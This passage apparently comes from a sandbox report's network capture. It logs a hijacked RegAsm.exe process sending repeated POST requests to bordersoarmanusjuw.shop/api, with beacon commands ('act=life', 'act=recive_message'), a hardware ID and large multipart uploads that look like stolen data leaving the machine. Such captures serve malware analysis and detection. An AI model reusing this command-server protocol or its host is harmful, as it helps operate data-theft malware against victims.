                                                                                                                                            Content-Length: 584522
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:38 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-04-21 13:31:40 UTC | 820 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:40 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=ktf3bokel4qgu9qtsit5hpke0e; expires=Thu, 15-Aug-2024 07:18:19 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2FeiLXcM8w1VXEwA8e25l5m10qQ1t%2BCTOb3nDeWFiGqgZ5XqYH2AQumijOGhIAL1XuF7h2LFe63Tk1aWlyaKmzo%2B9wfUdyNRhsQ%2FJKq90BdzYZ8zrhtjktT2jQRgHXOt4Kl%2FIY77sj%2F%2FaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc4fffa36734-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49774 | 172.67.189.66 | 443 | 5948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:41 UTC | 270 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:41 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                            Data Ascii: act=life
2024-04-21 13:31:41 UTC | 818 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:41 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=msbsf3orbv1scsjfi3f85cnjda; expires=Thu, 15-Aug-2024 07:18:20 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IMlfQ476R%2BudrV2vG50zBq9ZZFn5PGbi0a7ISf1fI%2B95pd7Z24tvkR%2FU1TqUxK99FxtcQhObzY6kbGQh8mxr%2Br6zzD3d1TTZ1CtW8A0YWDWXeEL%2FQGSm%2BS7rfQk6cLoENhw3opP42PIiJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc611b4e7bdc-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:41 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-04-21 13:31:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49775 | 172.67.189.66 | 443 | 5948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:42 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 49
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:42 UTC | 49 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
2024-04-21 13:31:42 UTC | 824 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:42 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=u7jdsppa9rgariauvsmugp279q; expires=Thu, 15-Aug-2024 07:18:21 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3h%2B2jD%2Fsg0Ci%2Fl3HYVj1uVPOPJ2ErVkAopB70EH7%2FUOBcRp2%2FoBfX4h69XvOTl%2F608ts%2FJU5RnDBdOTh12v9KVZuy7sKw%2F2wN4HOHi846sfcwqHpCthXDh%2BMbmD1hxOYDd1vcyHyuOKAXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc65ee16b094-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            Data Ascii: 7PnMB/lLEbe0W+wRSQOrUE6pf05zKoybhfmYuwUdA+q1fG2m3UsAhv1e8RRAngrBQrkaZ1prvDP5rZ2WnKk2yyj0BAtU+iCq5FONHHkfk0xqtWdSJ3qY94H5kJctKXfqmVRh4uFHALrhZtQZaD6eze8Ie3paY922pSWcr1E5V7agWcAGhG6BGrDzQbh5I5ZtI6x7dgMqkLuJwZCLARFj8rVIbZLVUyyW4WbUPV0bu1xSuHpfms8Rv7mMqfY0Bed
                                                                                                                                            2024-04-21 13:31:42 UTC1369INData Raw: 4d 76 77 56 36 7a 71 6a 58 72 77 4a 53 45 54 6f 32 41 61 6b 54 70 6e 6d 73 37 42 68 67 52 42 7a 54 61 51 71 45 76 75 75 46 6b 41 6f 2f 6c 50 42 4b 37 4a 53 74 52 64 62 53 65 62 55 47 61 42 61 30 59 33 59 71 79 76 75 66 6d 6b 70 78 45 5a 52 38 36 5a 66 46 6d 4f 78 46 59 5a 46 33 6a 2f 37 41 6b 59 50 73 5a 6c 51 69 45 58 61 67 74 58 76 52 34 4a 6b 4a 45 32 6b 57 44 71 58 79 52 59 66 5a 76 34 4e 69 6d 32 35 57 72 34 46 56 45 6e 74 33 68 61 6a 57 39 6d 46 32 36 41 72 37 33 39 6c 4a 63 52 49 55 2f 71 6e 58 42 4e 73 73 31 62 4f 4b 2f 55 61 30 32 34 31 44 2b 37 44 55 50 45 63 6d 61 37 44 6f 69 50 75 4f 77 4a 4f 30 41 38 36 6c 37 73 2b 63 77 48 2b 55 73 52 74 37 52 62 37 44 6c 4a 4c 37 74 73 64 71 6c 62 63 69 74 4b 71 4c 2b 46 70 59 69 58 49 55 30 44 38 71 31 4d
                                                                                                                                            Data Ascii: MvwV6zqjXrwJSETo2AakTpnms7BhgRBzTaQqEvuuFkAo/lPBK7JStRdbSebUGaBa0Y3YqyvufmkpxEZR86ZfFmOxFYZF3j/7AkYPsZlQiEXagtXvR4JkJE2kWDqXyRYfZv4Nim25Wr4FVEnt3hajW9mF26Ar739lJcRIU/qnXBNss1bOK/Ua0241D+7DUPEcma7DoiPuOwJO0A86l7s+cwH+UsRt7Rb7DlJL7tsdqlbcitKqL+FpYiXIU0D8q1M
                                                                                                                                            2024-04-21 13:31:42 UTC1369INData Raw: 6f 68 6c 39 54 7a 51 62 6d 45 42 67 62 42 37 36 55 61 5a 31 70 72 76 47 75 70 31 5a 43 4c 5a 55 42 2f 62 72 46 45 5a 66 4b 35 43 78 32 33 37 50 4e 42 75 48 6b 6d 70 67 31 4c 36 45 4c 48 6c 73 2b 38 72 2b 44 73 79 5a 35 38 54 43 61 6e 78 41 55 67 34 31 6a 37 58 59 39 30 2f 6f 6d 30 31 4a 4b 6e 4e 55 50 45 63 69 38 43 77 78 45 53 70 61 53 70 39 6a 51 45 56 2f 37 42 45 48 6d 6d 6f 56 6f 38 54 69 33 4f 74 44 31 6c 66 37 73 77 66 36 52 43 78 35 62 50 76 49 4b 6b 6a 4b 42 79 6e 4b 6a 6d 58 34 6c 38 66 63 61 39 44 78 54 32 79 46 4e 4e 75 4e 58 43 6e 73 33 76 43 48 73 48 4f 67 4f 31 76 33 48 68 6b 4b 38 68 58 51 37 47 46 51 42 4a 74 72 6c 4c 66 49 76 55 61 30 32 34 31 44 2b 2b 62 53 4f 73 4e 6c 2b 61 7a 78 47 2f 74 61 69 70 39 6a 52 45 41 70 2f 63 46 54 7a 72 73
                                                                                                                                            Data Ascii: ohl9TzQbmEBgbB76UaZ1prvGup1ZCLZUB/brFEZfK5Cx237PNBuHkmpg1L6ELHls+8r+DsyZ58TCanxAUg41j7XY90/om01JKnNUPEci8CwxESpaSp9jQEV/7BEHmmoVo8Ti3OtD1lf7swf6RCx5bPvIKkjKBynKjmX4l8fca9DxT2yFNNuNXCns3vCHsHOgO1v3HhkK8hXQ7GFQBJtrlLfIvUa0241D++bSOsNl+azxG/taip9jREAp/cFTzrs
                                                                                                                                            2024-04-21 13:31:42 UTC1369INData Raw: 6c 56 76 45 55 51 4a 34 4b 77 55 4b 59 65 67 63 7a 68 37 79 7a 37 61 53 55 30 32 55 78 43 2b 2b 35 65 43 57 65 79 46 59 5a 76 39 52 69 2f 44 6c 4a 4b 37 73 74 66 75 30 37 53 67 73 37 6a 4b 2f 73 37 4a 47 65 50 55 46 6e 7a 73 46 67 66 4a 61 39 44 78 54 32 32 55 62 78 4a 56 6c 37 6b 31 31 44 6e 48 4a 6d 62 30 36 4d 70 35 47 34 6c 4e 4e 6c 43 52 50 76 75 58 67 6c 6e 73 68 58 33 59 39 30 2f 30 45 56 47 44 37 47 5a 55 4a 78 64 31 34 44 66 75 54 36 6b 57 32 45 70 7a 45 31 54 2b 2b 49 59 63 41 48 56 46 63 35 74 37 52 62 6f 53 7a 59 6b 67 70 73 55 75 42 36 42 7a 49 6a 39 64 4c 77 6f 50 58 57 64 4b 54 6e 6a 37 44 35 7a 63 39 59 2b 6f 32 32 6a 46 4f 4e 48 44 41 47 42 73 48 76 70 54 4a 6e 57 6d 75 39 6f 36 6d 6c 34 49 38 78 58 55 62 75 63 61 42 6c 6e 73 52 6e 47 4a
                                                                                                                                            Data Ascii: lVvEUQJ4KwUKYegczh7yz7aSU02UxC++5eCWeyFYZv9Ri/DlJK7stfu07Sgs7jK/s7JGePUFnzsFgfJa9DxT22UbxJVl7k11DnHJmb06Mp5G4lNNlCRPvuXglnshX3Y90/0EVGD7GZUJxd14DfuT6kW2EpzE1T++IYcAHVFc5t7RboSzYkgpsUuB6BzIj9dLwoPXWdKTnj7D5zc9Y+o22jFONHDAGBsHvpTJnWmu9o6ml4I8xXUbucaBlnsRnGJ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49776 | 172.67.189.66 | 443 | 5948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:42 UTC | 289 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 18158
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:42 UTC | 15331 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

879B2FF1AFA74E08B399523B6273FBFA
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2024-04-21 13:31:42 UTC | 2827 | OUT | Data Raw: (binary)
2024-04-21 13:31:43 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:43 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=n13v8g9ndi3mvuo267si0shvmv; expires=Thu, 15-Aug-2024 07:18:22 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0EfaUD4%2F%2Bz9w4qP5GcjsVcn3HK6HimPKzOr1PtmeMPLLpc4ElCnDRgAGKNIrWNu0sGlELMJY8af1br1Chca%2FakLUYjeM9kKkTzCMz38nXAw3s4jfgPyJ9i77cMlEfq8dL9NqVPP0Wyj6KA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc69fca4673e-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:43 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49777 | 172.67.189.66 | 443 | 5948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:43 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8779
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:43 UTC | 8779 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

879B2FF1AFA74E08B399523B6273FBFA
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2024-04-21 13:31:44 UTC | 816 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:44 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=8h0br9iavo0vaa6mm9coq212ra; expires=Thu, 15-Aug-2024 07:18:23 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5UmpRbYgCQ%2Bt%2B0uMPtYpDZcB1l6q6yYBPIGk3r%2B3Ufn4lv%2FobKugxEAxjg8W7Vm9pInsfUcT%2FrmqoFKWgHnqYv1FnJy4uJZEUllvEWxiKsOohT5TQnq7auck2JnUBXEEzeZPZHpeawYUIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc6ed9dcad76-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:44 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49778 | 172.67.189.66 | 443 | 5948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:44 UTC | 289 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 20432
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:44 UTC | 15331 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

879B2FF1AFA74E08B399523B6273FBFA
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

3
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2024-04-21 13:31:44 UTC | 5101 | OUT | Data Raw: (binary)
2024-04-21 13:31:44 UTC | 814 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:44 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=v82t6fmg2b8s29jdn942lopfah; expires=Thu, 15-Aug-2024 07:18:23 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rdNnIzccPmtu6nAzNj7LQ5QSeUS%2FlG14m9yJm8ECR8Bazzc%2BVu1thAalWI17%2BWy8ju5EyvblhZ8lG4hScR1eNwHCdZQJuFrecYcDsGFuRajsiZMuP3yhrmSKs6JBwAo1EBlKXr5v5MnH%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc73bf3db0cd-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:44 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49779 | 172.67.189.66 | 443 | 5948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:45 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 7091
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:45 UTC | 7091 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

879B2FF1AFA74E08B399523B6273FBFA
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

1
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2024-04-21 13:31:45 UTC | 820 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:45 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=flcnq1n5shp5g6ovhbd0resgk1; expires=Thu, 15-Aug-2024 07:18:24 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bFsdi%2FfQ79Yq31%2BwMjHfrktW%2B2drXK1seWqwOfiywGMRpHB7p69Zw%2FG32Xi3XQ%2FD3tq57ethBqnk6idG6P6XxQ3qkeSt64q%2BE7PnozyX3uGqaEUPZ0xSTIOSH6BNiLjmUzHdJ4j%2BbXJrVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc7849fab0bd-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:45 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49780 | 172.67.189.66 | 443 | 5948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:45 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1388
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:45 UTC1388OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-04-21 13:31:46 UTC | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:46 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=glf1i0drgvimidhkso28j2p950; expires=Thu, 15-Aug-2024 07:18:25 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0gm8S6SUzDqX41jmdL5rpMNUtR3IddZDLEupRn5a8V8mxr9G1x9h8Lg6pNk%2BDNor5p6DE46PtKO3MoWLBFNsD6k5LjQviLFPGfOZP1d363sVazt7kChScSbTyPwBN9GAgRuCx%2FW0leSoWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc7c3bc444d9-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:46 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49781 | 172.67.189.66 | 443 | 5948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:47 UTC | 290 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 591259
                                                                                                                                            Host: bordersoarmanusjuw.shop
